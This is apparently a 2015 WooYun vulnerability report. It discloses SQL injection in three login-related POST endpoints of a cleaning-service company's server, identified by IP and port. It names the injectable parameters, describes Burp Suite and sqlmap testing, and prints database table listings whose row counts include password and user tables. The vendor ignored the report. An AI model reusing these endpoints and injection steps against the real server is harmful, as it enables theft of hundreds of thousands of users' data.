当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147507

漏洞标题:E家洁某站点多处SQL注入漏洞(15个库\涉及40万用户信息)

相关厂商:1jiajie.com

漏洞作者: 路人甲

提交时间:2015-10-19 09:52

修复时间:2015-10-24 09:54

公开时间:2015-10-24 09:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

多处注入,涉及15个库,40多万用户信息,几百万订单信息!~~~

详细说明:

E家洁某站点多处SQL注入漏洞(15个库+40万用户信息)
1、注入点一

http://123.57.231.146:808/index.php?action=login&do=auth (POST)
username=admin&password=123456&user_id=345&user_name=admin&user_phone=13333333333


username存在注入,也是看了大牛的漏洞才找到这个地址的!~~~还没有修复

1.jpg


WooYun: E家洁某站点SQL注入漏洞(涉及15个库40万用户信息)
具体的数据见大牛的地址!~~~
2、注入点二

http://123.57.231.146:808/index.php?action=login&do=getUserInfo (POST)
user_name=admin


user_name存在注入
看burpsuite测试

2.jpg


3.jpg


上sqlmap测试
没有添加参数测试,存在时间盲注

4.jpg


添加参数--level 3测试,注入不一样!~~~

5.jpg


6.jpg


Database: sq_ejiajie
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| push_msg_queue | 2340536 |
| promo_code_type | 1358320 |
| driver_login_record | 1037306 |
| b_wx_url_record | 994851 |
| attendance_log | 806808 |
| promo_code_record | 724470 |
| user_request_order_log | 675203 |
| user_visit_record | 625581 |
| driver_call_record | 613764 |
| user_request_order | 577845 |
| user_money_record_log | 536889 |
| push_message_info | 482235 |
| user_password | 416681 |
| user_request_order_ext | 300483 |
| mobile_number | 288731 |
| user_comment_relation | 267405 |
| company_stock_goods_info | 266178 |
| user_money_record | 261989 |
| b_wx_qr_code_record | 224111 |
| mobile | 208995 |
| b_wx_promo_code_record | 205251 |
| broadcast | 202809 |
| user_money_relation | 170712 |
| da_order | 152061 |
| driver_order_push | 147983 |
| driver_call_record_now | 127274 |
| user_charge_reward_record | 100515 |
| user_address_info | 95623 |
| all_user_finger | 95512 |
| user_money_relation_log | 91544 |
| b_wx_point_like_zan | 86497 |
| table_ceshi | 65535 |
| all_user_info | 64098 |
| driver_busy_time | 54932 |
| user_charge_record | 43783 |
| user_call_record | 36746 |
| shop_data_stats | 34233 |
| shop_daily_pod_stats | 34116 |
| user_free_code | 30329 |
| driver_pay_record | 28000 |
| shop_daily_ine_stats | 27969 |
| shop_daily_ine_stats_detail | 27969 |
| da_driver_order | 25785 |
| weibo_feed_relation | 23115 |
| promo_code_name | 22558 |
| ejiajie_push_record | 21505 |
| user_request_order_temp | 20330 |
| promote_access_record | 18069 |
| shop_expense_record | 16421 |
| driver_info | 14105 |
| driver_password | 14024 |
| new_customer_report | 13570 |
| driver_state_relation | 11841 |
| user_request_card | 10777 |
| driver_month_rank | 10673 |
| complain_order_relation | 10183 |
| da_driver | 9414 |
| driver_modification | 8938 |
| driver_info_copy | 8072 |
| driver_week_rank | 8058 |
| black_log | 8028 |
| driver_week_star | 6913 |
| da_order_type | 6673 |
| user_password_bak_3 | 6362 |
| user_high_intention | 5877 |
| user_password_bak | 5560 |
| da_mobile_scan | 5065 |
| project_number_total | 5043 |
| driver_visit_record | 4132 |
| company_shop_consuming_record | 4105 |
| da_user_dau | 4002 |
| user_comment_relation_xxoo | 3758 |
| user_problem_report | 3716 |
| da_driver_dau | 3610 |
| activity_column_data | 3396 |
| da_user_dnu | 3356 |
| da_day_data | 3280 |
| collect_driver_relation | 3087 |
| a | 2966 |
| user_phone_info | 2777 |
| b_weixin_order_temp | 2459 |
| user_want_service | 2300 |
| user_charge_back_record | 2097 |
| user_request_order_gaode | 2064 |
| driver_info_temp_2 | 2051 |
| driver_call_record_temp | 1980 |
| channle_record | 1958 |
| driver_address_record | 1952 |
| company_stock_record | 1423 |
| driver_info_other | 1337 |
| driver_charge_record | 1278 |
| driver_punish_record | 1200 |
| car_info | 1079 |
| invoiced_record | 1055 |
| user_password_bak_2 | 802 |
| shop_money_record | 517 |
| driver_cancel | 494 |
| driver_on_line | 482 |
| user_pay_calls | 425 |
| jc_admin_user | 417 |
| recharge_telephone_log | 411 |
| driver_call_record_temp2 | 376 |
| user_deals_info | 365 |
| user_invite_record | 356 |
| user_comment_record | 300 |
| shop_info | 298 |
| user_call_count | 290 |
| add_phone | 221 |
| exchange_info | 211 |
| company_property_record | 188 |
| company_stock_goods | 179 |
| recharge_telephone | 179 |
| driver_info_card | 178 |
| driver_train_record | 178 |
| gaode_call_order | 149 |
| plan_task | 129 |
| tmp_calc | 120 |
| driver_info_upgrade | 110 |
| company_property_goods | 101 |
| special_user | 100 |
| user_charge_reward | 97 |
| b_wx_qr_code | 94 |
| taobao_order_stats | 93 |
| statistics_tab | 87 |
| user_request_order_modify | 79 |
| da_scan_type | 75 |
| driver_punish_reason_detail | 61 |
| monthly_service_info | 40 |
| duiba_goods_record | 25 |
| system_announcement | 24 |
| company_store_house | 23 |
| user_tele_info | 23 |
| channel_type | 22 |
| driver_reason_two_type | 22 |
| market_info | 21 |
| company_stock_deploy_record | 19 |
| activity_column_list | 18 |
| auntday | 14 |
| shop_daily_ine_remark | 14 |
| driver_recyclephone | 12 |
| recover | 12 |
| broadcast_category | 11 |
| company_property_supplier | 11 |
| user_prize | 11 |
| user_recommen_driver | 11 |
| monthly_settlement | 10 |
| order_type | 10 |
| driver_report_order | 8 |
| order_server_log | 7 |
| reset_score_record | 7 |
| test_test | 7 |
| all_city_info | 6 |
| user_deals_style_branch | 6 |
| bank_info | 5 |
| card_sell_record | 5 |
| driver_complain | 5 |
| driver_punish_reason_type | 5 |
| company_property_goods_type_list | 4 |
| ivr_iphone_broad_cast_info | 4 |
| user_notice_relation | 4 |
| b_wx_send_record | 3 |
| service_info | 3 |
| b_wx_point_like_type | 2 |
| driver_highintent_info | 2 |
| driver_report_insurance | 2 |
| ivr_broad_cast_info | 2 |
| coupon_activity_list | 1 |
| coupon_code_list | 1 |
| coupon_type_list | 1 |
| duducar_admin | 1 |
| fangzhongjie_info | 1 |
| fangzhongjie_user_relation | 1 |
| jia_duanxin | 1 |
+----------------------------------+---------+
Database: sq_ejiajie_v2
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| order_status | 3452654 |
| user_order | 2355576 |
| admin_proc_log | 2186611 |
| order_worker | 1994975 |
| worker_login_log | 1442334 |
| auto_assign_log | 1285166 |
| user_info | 745351 |
| transaction_record | 743486 |
| user_address | 544835 |
| clean_order | 542985 |
| user_info_old | 520351 |
| order_pay | 519129 |
| worker_parttime_busy_time | 298318 |
| user_comment | 275997 |
| company_stock_goods_info | 266180 |
| agency_pay_record | 151539 |
| send_msg_log | 144701 |
| user_order_process | 126436 |
| driver_busy_time | 55582 |
| user_charge_record | 33746 |
| order_hidden_worker | 27345 |
| worker_block | 20023 |
| pop_order | 16423 |
| worker_info | 15517 |
| worker_pay_record | 11316 |
| complain_order | 6161 |
| recharge_card_record | 5982 |
| worker_holiday | 5450 |
| company_shop_consuming_record | 5082 |
| pop_checkin_record | 3019 |
| order_rule | 2387 |
| company_stock_record | 1425 |
| invoiced_record | 1374 |
| admin_group_priv | 1173 |
| baidu_order | 1087 |
| pop_daily_checkin | 1080 |
| jc_admin_user | 829 |
| user_block_worker | 738 |
| role_change_record | 537 |
| pop_notify | 308 |
| agency_info | 249 |
| company_stock_goods | 179 |
| company_property_goods | 101 |
| coordinate | 82 |
| agency_group_priv | 67 |
| monthly_rule | 57 |
| shop_info | 55 |
| worker_insurance | 43 |
| jc_admin_group | 29 |
| ordersrc | 29 |
| wash_deliver | 29 |
| company_store_house | 23 |
| company_stock_deploy_record | 19 |
| period_order | 18 |
| visit_record | 15 |
| company_property_supplier | 11 |
| app_update_info | 6 |
| recharge_card_rule | 5 |
| company_property_goods_type_list | 4 |
| agency_group | 3 |
+----------------------------------+---------+


7.jpg


3、注入点三

http://123.57.231.146:808/index.php?action=login&do=sendPwdToPhone (POST)
id=345&username=admin&telephone=13333333333


id和username都存在注入,跟注入点一又不一样
burpsuite测试

8.jpg


9.jpg


sqlmap测试

10.jpg


11.jpg


4、不注入获取用户电话号码
用top500用户测试

12.jpg


13.jpg

漏洞证明:

如上

修复方案:

你们懂得!~~~
送礼物?

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-24 09:54

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无